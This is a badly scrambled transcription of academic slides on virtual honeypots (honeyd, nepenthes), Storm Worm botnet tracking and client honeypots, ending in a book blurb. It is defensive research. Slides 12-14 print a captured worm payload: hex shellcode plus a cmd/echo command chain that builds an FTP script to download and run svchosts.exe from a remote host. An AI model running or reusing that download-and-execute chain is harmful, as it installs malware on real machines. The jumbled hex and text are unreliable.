Virtual Honeypots UNIVERSITÄT MANNHEIM. Know Your Enemy. Pi1 - Laboratory for Dependable Distributed Systems

Transcription

1 Virtual Honeypots Know Your Enemy Pi1 - Laboratory for Dependable Distributed Systems

2 Outline Honeypot 101 Examples honeyd nepenthes Honeyclients Conclusion

3 Honeypots Network-based measurements often show us only the results of attacks Scanning activity caused by worms Spam sent via botnets How to learn more about the attackers? A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource. Know Your Enemy

4 Honeypots High-interaction Low-interaction Real services, OS s, or applications Emulation of TCP/IP stack, vulnerabilities,... Higher risk Lower risk Hard to deploy / maintain Easy to deploy / maintain Capture extensive amount of information Example: Gen III honeynets Capture quantitative information about attacks Examples: honeyd, nepenthes, labrea,...

5 honeyd Low-interaction honeypot written by Niels Provos Available at Virtualization of TCP/IP stack Fool tools like nmap & xprobe Complex setups possible Latency, packets loss, bandwith,... Can emulate complex network setups

6 honeyd honeyd libnet libpcap Personality engine Userland IP-Stack ICMP UDP Service External Program TCP proxy

7 Malware Collection Hundreds of new malware samples each month How to learn more about malware? Quantitative information Qualitative information Information about new malware Usage of honeypot-based techniques Use deception & emulation

8 nepenthes Tool to automatically collect malware like bots and other autonomous spreading malware Emulate known vulnerabilities and download malware trying to exploit these vulnerabilities Available at

9 Schematic Overview

10 Vulnerability modules Emulate vulnerable services vuln-lsass vuln-dcom downloadtftp submitpostgres } vuln-... } vulnms06070 vulnarcserve Play with exploits downloadhtthttp until they submit-send us their payload (finite state machine) shellcodegeneric Currently more than 20 available shellemuwinnt downloadcsend vulnerability modules submit-file downloadlinnorman submit- shellcodesignatures More in development download- Analysis of known vulnerabilities submit-... &... exploits necessary } } exploit payload URI binary Automation possible?

11 Shellcode modules compromised machine http Generic downloadlinnorman XOR decoder submit- sch_generic_createprocess downloadsubmit sch_generic_url sch_generic_cmd submitpostgres submit-file shellcodegeneric shellemuwinnt shellcodesignatures Automatically extract URL used by malware download-to transfer submit- itself to http downloadtftp downloadcsend sch_generic_xor } } ad URI binary

12 Payload received after successfull emulation [ dia ] = [ hexdump(0x1bf7bb68, 0x000010c3) ] = [ dia ] 0x bf ff 53 4d c8...smb s... [ dia ] 0x [ dia ] 0x c ff a [ dia ] 0x e d e ~......~.` [ dia ] 0x a b a e 30..z n0 [ dia ] 0x a a j...f#..b... [ dia ] 0x AAAAAAAA AAAAAAAA [...] [ dia ] 0x AAAAAAAA AAAAAAAA [ dia ] 0x c a #..W.....B.B. [ dia ] 0x c4 54 f2 ff ff fc e b B.B..T.....F... [ dia ] 0x c 8b 7c ef 8b 4f 18 8b 5f eb E<..x...O.._.. [ dia ] 0x0490 e3 2e 49 8b 34 8b 01 ee 31 c0 99 ac 84 c I t. [ dia ] 0x04a0 c1 ca 0d 01 c2 eb f4 3b e3 8b 5f 24...; T$.u.._$ [ dia ] 0x04b0 01 eb 66 8b 0c 4b 8b 5f 1c 01 eb 8b 1c 8b 01 eb..f..k._... [ dia ] 0x04c0 89 5c c3 31 c0 64 8b c0 78 0f 8b.\$..1.d.@0..x.. [ dia ] 0x04d0 40 0c 8b 70 1c ad 8b e9 0b b [ dia ] 0x04e c b 68 3c 5f 31 f eb 0d 4....h <_1.`V.. [ dia ] 0x04f0 68 ef ce e fe 8a 0e 57 ff e7 e8 ee ff h...`h....w... [ dia ] 0x0500 ff ff 63 6d f f 20 6f 70..cmd /c echo op [ dia ] 0x e e e e en [ dia ] 0x e 3e >> ii &ech [ dia ] 0x0530 6f e 3e o user a a >> ii [ dia ] 0x f e e 3e &echo b inary >> [ dia ] 0x f ii &ech o get sv [ dia ] 0x f e e 3e chosts.e xe >> ii [ dia ] 0x f e 3e &echo b ye >> ii [ dia ] 0x d 6e 20 2d d 73 3a 69 &ftp -n -v -s:i [ dia ] 0x c f i &del i i &svcho [ dia ] 0x05a e d 0a sts.exe...bbbbbb [ dia ] 0x05b BBBBBBBB BBBBBBBB

13 Payload received after successfull emulation [ dia ] = [ hexdump(0x1bf7bb68, 0x000010c3) ] = [ dia ] 0x bf ff 53 4d c8...smb s... [ dia ] 0x [ dia ] 0x c ff a [ dia ] 0x e d e ~......~.` [ dia ] 0x a b a e 30..z n0 [ dia ] 0x a a j...f#..b... [ dia ] 0x AAAAAAAA AAAAAAAA [...] [ dia ] 0x0450 cmd /c AAAAAAAA AAAAAAAA [ dia ] 0x echo open 0c a >> 42 ii 90..#..W.. &...B.B. [ dia ] 0x c4 54 f2 ff ff fc e b B.B..T.....F... [ dia ] 0x echo 3c 8b 7c user a ef a 8b 4f 18 8b 5f 20 >> 01 ii eb E<..x.. &.O.._.. [ dia ] 0x0490 e3 echo 2e 49 8b binary 34 8b 01 ee 31 c0 99 ac 84 c0 >> 74 ii 07..I.4... & 1...t. [ dia ] 0x04a0 c1 ca 0d 01 c2 eb f4 3b e3 8b 5f 24...; T$.u.._$ [ dia ] 0x04b0 01 echo eb 66 8b get 0c 4b svchosts.exe 8b 5f 1c 01 eb 8b 1c 8b >> 01 ii eb..f..k._ &... [ dia ] 0x04c0 89 echo 5c bye c3 31 c0 64 8b c0 78 >> 0f ii 8b.\$..1.d &.@0..x.. [ dia ] 0x04d0 40 0c 8b 70 1c ad 8b e9 0b b [ dia ] 0x04e c b 68 3c 5f 31 f eb 0d 4....h <_1.`V.. [ dia ] 0x04f0 68 ftp ef ce -n e0 60 -v 68 -s:ii 98 fe 8a 0e 57 ff e7 e8 ee ff h...`h.. &..W... [ dia ] 0x0500 ff ff 63 6d f f 20 6f 70..cmd /c echo op del ii & [ dia ] 0x e e e e en [ dia ] 0x svchosts.exe e 3e >> ii &ech [ dia ] 0x0530 6f e 3e o user a a >> ii [ dia ] 0x f e e 3e &echo b inary >> [ dia ] 0x f ii &ech o get sv [ dia ] 0x f e e 3e chosts.e xe >> ii [ dia ] 0x f e 3e &echo b ye >> ii [ dia ] 0x d 6e 20 2d d 73 3a 69 &ftp -n -v -s:i [ dia ] 0x c f i &del i i &svcho [ dia ] 0x05a e d 0a sts.exe...bbbbbb [ dia ] 0x05b BBBBBBBB BBBBBBBB

14 Payload received after successfull emulation [ dia ] = [ hexdump(0x1bf7bb68, 0x000010c3) ] = [ dia ] 0x bf ff 53 4d c8...smb s... [ dia ] 0x [ dia ] 0x c ff a [ dia ] 0x e d e ~......~.` [ dia ] 0x a b a e 30..z n0 [ dia ] 0x a a j...f#..b... [ dia ] 0x AAAAAAAA AAAAAAAA [...] [ dia ] 0x0450 cmd /c AAAAAAAA AAAAAAAA [ dia ] 0x echo open 0c a >> 42 ii 90..#..W.. &...B.B. [ dia ] 0x c4 54 f2 ff ff fc e b B.B..T.....F... [ dia ] 0x echo 3c 8b 7c user a ef a 8b 4f 18 8b 5f 20 >> 01 ii eb E<..x.. &.O.._.. [ dia ] 0x0490 e3 echo 2e 49 8b binary 34 8b 01 ee 31 c0 99 ac 84 c0 >> 74 ii 07..I.4... & 1...t. [ dia ] 0x04a0 c1 ca 0d 01 c2 eb f4 3b e3 8b 5f 24...; T$.u.._$ [ dia ] 0x04b0 01 echo eb 66 8b get 0c 4b svchosts.exe 8b 5f 1c 01 eb 8b 1c 8b >> 01 ii eb..f..k._ &... [ dia ] 0x04c0 89 echo 5c bye c3 31 c0 64 8b c0 78 >> 0f ii 8b.\$..1.d &.@0..x.. [ dia ] 0x04d0 40 0c 8b 70 1c ad 8b e9 0b b [ dia ] 0x04e c b 68 3c 5f 31 f eb 0d 4....h <_1.`V.. [ dia ] 0x04f0 68 ftp ef ce -n e0 60 -v 68 -s:ii 98 fe 8a 0e 57 ff e7 e8 ee ff h...`h.. &..W... [ dia ] 0x0500 ff ff 63 6d f f 20 6f 70..cmd /c echo op del ii & [ dia ] 0x e e e e en [ dia ] 0x svchosts.exe e 3e >> ii &ech [ dia ] 0x0530 6f e 3e o user a a >> ii [ dia ] 0x f e e 3e &echo b inary >> [ dia ] 0x0550 ftp://a:a@ /svchosts.exe f ii &ech o get sv [ dia ] 0x f e e 3e chosts.e xe >> ii [ dia ] 0x f e 3e &echo b ye >> ii [ dia ] 0x d 6e 20 2d d 73 3a 69 &ftp -n -v -s:i [ dia ] 0x c f i &del i i &svcho [ dia ] 0x05a e d 0a sts.exe...bbbbbb [ dia ] 0x05b BBBBBBBB BBBBBBBB

15 Download modules download-{http,tftp} downloadhttp submit- http Handles HTTP / TFTP URIs downloadtftp submitpostgres download-ftp downloadcsend FTP client from Windows is not submit-file } URI downloadlink download-... } binary RFC compliant... submitnorman download-{csend,creceive} submit-... download-link link:// /hj4g==

16 Submission modules submit-file } binary submitpostgres submithttp submitnorman submit-file submit-... Write file to hard disk submit-{mysql,postgres,mssql} Store file in database submit-norman Submit file to sandboxes for analysis submit-http Send file via HTTP POST

17 CWSandbox

18 Statistics: nepenthes Eight weeks (December 06/January 07) nepenthes on ~8,000 IP addresses on one physical machine: 13,000,000+ files downloaded 2,600+ unique binaries based on md5sum ~300 different botnets Anti-virus engines detect between 70% and 90% of the binaries Complete set (2,634 samples) AV 1 AV 2 AV 3 AV One bot variant dominates the collection

19 Statistics

20 Tracking Botnets Learning more about botnets with honeypots 1. Collect samples with honeypots 2. Automated analysis, e.g., cwsandbox.org 3. Join botnet and observe from inside Know Your Enemy: Tracking Botnets LEET 08: Measurements and Mitigation of P2Pbased Botnets: A Case Study on Storm Worm

21 Spam Mails 29/08 02/09 04/09 13/09 16/09 18/09 22/09 25/09 27/09 14/10 01/09 03/09 09/09 14/09 17/09 21/09 23/09 26/09 28/09 S tocks Money Kitty Halloween 19/10 22/10 27/10 29/10 08/11 11/11 14/11 16/11 20/11 22/11 21/10 23/10 28/10 07/11 10/11 12/11 15/11 18/11 21/ S tocks J obs Chris tmas Newyear Spam mails sent by one infected Newyear (x) Pharma (x) Valentine (x) Storm machine over several days 7500

22

23 Inside Storm Network-level behavior First versions: Overnet (Kademlia-based DHT) Obfuscation was added in October 2007 Called Stormnet in the following Seems to change from DHT to linked list Only bots present in Stormnet

24 Inside Storm Bot communication (simplified, valid for Overnet) Infected machine searches for specific keys within the network Botmaster knows in advance which keys are searched for publishes commands there rendezvous points

25 Key Search

26 Key Search

27 Modes 3.9 Überblick Two different modes: NAT or public IP address Spam/DoS- Bots Gateways Controller TCP und Overnet HTTP Actually Storm Worm is hybrid network with P2P component for lookup

28 Results (a) Wachstum von Stormnet im Dezember. Mit Beginn der Weihnachtskampagne zur Verbreitung am beginnt auch das Botnetz zu wachsen. Die Y-Achse spiegelt die Anzahl (in Tausend) der verschiedenen IP-Adressen pro halbe Stunde wieder. Thousands of bots in Stormnet for US Anzahl Peers in : : : : : : : : :30 Datum : :30 (b) Vergrößerter Ausschnitt von 4.8a. Die Tagesschwankungen unterliegen einem festen Rhythmus. Diurnal pattern in Stormnet size bbildung 4.8: Wachstum des Botnetzes im Dezember. Die Daten wurden freundlicherweise von Moritz Steiner zur Verfügung gestellt.

29 Results US IN -- TR stormbots date Number of bots in Stormnet, split by geo-location

30 Honeyclients Tracking New Attack Vectors

31 Malicious Websites More and more attacks against browsers Operating systems get better and better Applications become weakest link in chain Drive-by download to install malware Malicious website sends several exploits to visitor (typically encoded, not easy to detect) If one exploit is successful, malware is installed

32 Malicious Websites Social engineering is also common Trick user into downloading executable Often related to greeting cards or adult content Examples: Storm Worm and Zlob Malicious results in search engines Attackers place sites within Google s search index requests return these malicious sites ~1-2 % of search results are malicious

33 Malicious Websites Analyzed several billion URLs and executed an onducted over a period of twelve months Our results reveal several attack stratepages into malware infection vectors. erent aspects of content control responowser exploitation: advertising, thirdcontributed content and web server selysis and examples, 4.5M we URLs show how each an be used to exploit web browsers. re interested in examining how malware browser vulnerabilities to install itself in-depth analysis of Found malicious sites Virtual Machine Web Page Repository MapReduce Heuristical URL Extraction Monitor Execution Analysis. In addition, we evaluate trends from Internet alicious web pages. We show the disbinaries across Explorer downloading different sites overa time. binary Result a on the evolution of malware binaries s obfuscation to techniques honeypot, used to make Malicious Page lt to reverse engineer. Repository this paperadditional is organized as follows: malicious in s related work. Section 3 provides an sites Figure 1: This diagram shows an overview of our detectio anism for automatic detection of maliion 4, we discuss how different types of execution in a virtual machine if the URL exhibits malicious be tecture. We heuristically select candidate URLs and determ adversaries to place exploits on thirdd show different techniques for exploit- Provos et al., The Ghost in the Browser: ior Analysis of theof installed Web-based software Malware but- rather HotBots 07 identify the m nisms used to introduce the software into the system v Thorsten gainingholz control Laboratory overfor a user s Dependable computer Distributed Systems Troopers 2008 URL

34 Social Engineering

35 Social Engineering

36 Backends

37 Backends

38 Honeyclients Automatically search for malicious websites Simulate browsing behavior Closely observe system and detect anomalies HoneyMonkey (NDSS 06), Capture-HPC, HoneyC, HoneyClient, phoneyc,... Can be generalized to learn more about attacks against all kinds of client applications User simulation needed?

39 Honeyclients Capture-HPC ( capture-hpc) Client/Server model Analyze website with IE or other browser

40 Honeyclients Capture-HPC ( capture-hpc) Client/Server model Analyze website with IE or other browser " :27:44","visiting"," " :28:35","error0:NETWORK_ERROR ", " " :29:35","visiting"," " :30:33","error0:NETWORK_ERROR-404", " " :31:29","visiting"," " :32:04","error0:NETWORK_ERROR ", " " :55:00","visiting"," " :56:00","visited"," " :57:15","visiting"," " :58:45","visited","

41 " :41:14","malicious"," " :42:53","malicious"," " :44:03","malicious"," Honeyclients Capture-HPC ( Abbildung 5: Ausschnitt aus malicious.log capture-hpc) Client/Server model Analyze website with IE or other browser " :27:44","visiting"," Ergebnisse Sämtliche URLs die abgearbeitet wurden, wurden als malicious eingestuft. Da nur URLs untersucht wurden, die auf Blacklisten stehen, überrascht das Ergebnis zunächst nicht. Allerdings waren einige Webseiten zum Zeitpunkt der Untersuchung bereits offline, was " :28:35","error0:NETWORK_ERROR ", " " :29:35","visiting"," " :30:33","error0:NETWORK_ERROR-404", " " :31:29","visiting"," " :32:04","error0:NETWORK_ERROR ", " " :55:00","visiting"," " :56:00","visited"," " :57:15","visiting"," " :58:45","visited"," "file","24/3/ :37:56.717", "C:\Programme\Internet Explorer\iexplore.exe","Write","C:\syst.exe" "file","24/3/ :37:56.702", "System","Write","C:\WINDOWS\Temp\dnlsvc.exe" "file","24/3/ :37:57.452", "System","Write","C:\syst.exe" "process","24/3/ :37:57.733", "C:\Programme\Internet Explorer\iexplore.exe","created","C:\syst.exe" Abbildung 6: Beispiel für erfolgreiche Kompromittierung des Honeyclients

42 Conclusion Current honeypots are good at finding known attacks / automated attacks We can detect worms, botnets, and other automated threats Finding 0-day / targeted attacks is harder Why should an attacker waste his 0-day on my honeypot? How to trick a clever attacker?

43 Security Thorsten Holz breakthrough solution. Virtual honeypots share many attributes of traditional honeypots, but you can run thousands of them on a single system making them easier and cheaper to build, deploy, and maintain. In this hands-on, highly accessible book, two leading honeypot pioneers systematically introduce virtual honeypot technology. thorsten.holz@informatik.uni-mannheim.de VIRTUAL HONEYPOTS Honeypots have demonstrated immense value in Internet security, but physical honeypot deployment can be prohibitively complex, time-consuming, and expensive. Now, there s a One step at a time, you ll learn exactly how to implement, configure, use, and maintain virtual honeypots in your own environment, even if you ve never deployed a honeypot before. You ll learn through examples, including Honeyd, the acclaimed virtual honeypot created by coauthor Niels Provos. The authors also present multiple real-world applications for virtual honeypots, including network decoy, worm detection, spam prevention, and network simulation. After reading this book, you will be able to Compare high-interaction honeypots that provide real systems and services and the low-interaction honeypots that emulate them More information: Install and configure Honeyd to simulate multiple operating systems, services, and network environments Use virtual honeypots to capture worms, bots, and other malware Create high-performance hybrid honeypots that draw on technologies from both low- and high-interaction honeypots Implement client honeypots that actively seek out dangerous Internet locations Understand how attackers identify and circumvent honeypots Analyze the botnets your honeypot identifies, and the malware it captures Preview the future evolution of both virtual and physical honeypots AUTHORS Provos and Holz have written the book that the bad guys don't want you to read. Virtual Honeypots is a must-read and belongs on the bookshelf of anyone who is serious about security. Aviel D. Rubin, Ph.D., Johns Hopkins University Niels Provos is a senior staff engineer at Google. He developed Honeyd, an open source virtual honeypot that won the Tops in Innovation award from Network World and is one of the cocreators of OpenSSH. Provos holds a Degree in mathematics from the University of Hamburg and a Ph.D. in computer science and engineering from the University of Michigan. Thorsten Holz is a Ph.D. student at the Laboratory for Dependable Distributed Systems at the University of Mannheim, Germany. He is one of the founders of the German Honeynet Project and a member of the Steering Committee of the Honeynet Research Alliance. He regularly blogs at VIRTUAL HONEYPOTS P R O V O S H O L Z Virtual Honeypots is the best reference for honeypots today. Security experts Niels Provos and Thorsten Holz cover a large breadth of cutting-edge topics, from low-interaction honeypots to botnets and malware. If you want to learn about the latest types of honeypots, how they work and what they can do for you, this is the resource you need. Lance Spitzner, Founder, Honeynet Project VIRTUAL HONEYPOTS From Botnet Tracking to Intrusion Detection Cover design by Chuti Prasertsith Cover photograph by Ryan McVay/Stone/Getty Images, Inc. Text printed on recycled paper Includes FREE 45-Day Online Edition ISBN-13: ISBN-10: $49.99 U.S./$61.99 CANADA NIEL S PROVOS THORS TEN HOLZ Pi1 - Laboratory for Dependable Distributed Systems